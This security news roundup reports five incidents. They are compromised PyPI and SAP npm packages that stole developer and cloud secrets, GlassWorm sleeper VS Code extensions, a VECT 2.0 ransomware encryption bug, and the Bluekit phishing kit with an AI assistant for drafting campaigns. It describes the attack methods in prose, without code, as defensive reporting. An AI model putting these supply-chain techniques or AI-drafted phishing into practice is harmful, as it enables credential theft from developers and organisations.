Compromised PyPI package with over a million downloads distributed infostealer targeting developer secrets
A malicious elementary-data 0.23.3 release was published to PyPI and also propagated into a matching GitHub Container Registry image because the project's release workflow built the package and container image from the same compromised release path. The package is widely used in the dbt ecosystem and has more than 1.1 million monthly downloads.
The attacker abused a GitHub Actions script injection flaw by posting a malicious pull-request comment that executed attacker-controlled shell code inside the workflow. That exposed the workflow's GITHUB_TOKEN, allowing the attacker to forge a signed commit and trigger the project's legitimate publishing pipeline.
The payload executed automatically through a Python .pth file and targeted developer secrets including SSH keys, Git credentials, AWS / GCP / Azure credentials, Kubernetes secrets, Docker configuration, CI secrets, environment files and cryptocurrency wallet data. This makes the incident a strong example of how one workflow weakness can become a software supply chain compromise.
SAP npm packages compromised in supply chain attack to steal developer and cloud credentials
Multiple official SAP npm packages were compromised in a suspected TeamPCP supply-chain attack, affecting packages used with SAP's Cloud Application Programming Model and Cloud MTA development workflows. The compromised package versions were deprecated after discovery, but affected environments still required secret rotation and investigation.
The malicious packages included a preinstall script that launched a loader, downloaded the Bun JavaScript runtime from GitHub, and executed an obfuscated payload. The malware targeted npm and GitHub tokens, SSH keys, AWS / Azure / GCP credentials, Kubernetes secrets, CI / CD secrets and environment variables.
The attack also attempted to steal secrets directly from CI runner memory and upload encrypted data into public GitHub repositories under victim accounts. The malware contained self-propagation logic, meaning stolen npm or GitHub credentials could be used to compromise additional packages and repositories.
GlassWorm campaign resurfaces via sleeper OpenVSX extensions that activate malicious payloads
The GlassWorm campaign returned through 73 OpenVSX sleeper extensions that appeared benign when first uploaded and later turned malicious through updates or runtime payload retrieval. Six extensions had already been activated, while researchers assessed the rest as dormant or suspicious.
The malicious extensions cloned legitimate listings and used visual similarity to trick developers who might not check publisher names or unique identifiers closely. Some variants fetched a secondary VSIX package from GitHub, loaded platform-specific compiled modules, or used heavily obfuscated JavaScript to retrieve and install payloads at runtime.
Earlier GlassWorm activity targeted cryptocurrency wallets, credentials, access tokens, SSH keys and developer-environment data, and the latest wave shows a shift toward delayed activation to reduce early detection. This matters because IDE extensions sit inside trusted development workflows and can access high-value engineering environments.
VECT 2.0 mishandles encryption, causing permanent data loss for large files in ransomware incidents
Researchers warned that VECT 2.0 ransomware mishandles encryption nonces for larger files, causing much of the encrypted data to become permanently unrecoverable. Because the lost nonces are not transmitted to the attackers, even the ransomware operators would be unable to restore affected large files after payment.
The flaw affects files above a very small threshold, meaning routine enterprise data such as documents, spreadsheets, mailboxes, databases, VM disks and backups can be destroyed rather than recoverably encrypted. Researchers found the same destructive behavior across Windows, Linux and ESXi variants.
VECT operators had also discussed partnerships and supply chain targeting, including interest in exploiting victims of prior compromises, which makes the destructive encryption bug especially dangerous for organizations already exposed through dependency or infrastructure incidents.
New Bluekit service uses AI models to generate phishing campaign drafts and automate operations
Bluekit is a phishing kit with more than 40 templates targeting email accounts, cloud services, developer platforms and cryptocurrency services, including Outlook, Gmail, iCloud, GitHub and Ledger. Its operator panel combines domain setup, phishing page configuration and campaign management in a single interface.
The kit includes an AI Assistant panel supporting models such as Llama, GPT-4.1, Claude, Gemini, and DeepSeek to help generate campaign drafts. The AI output was described as an early campaign skeleton rather than a finished phishing flow, but it still shows how criminal tooling is starting to use AI to reduce operator effort.
Operators can configure phishing-page behavior, redirects, anti-analysis checks, VPN or proxy blocking, headless-browser filtering and victim-session monitoring. This makes the kit more operationally useful for criminals who want scalable phishing campaigns without building tooling from scratch.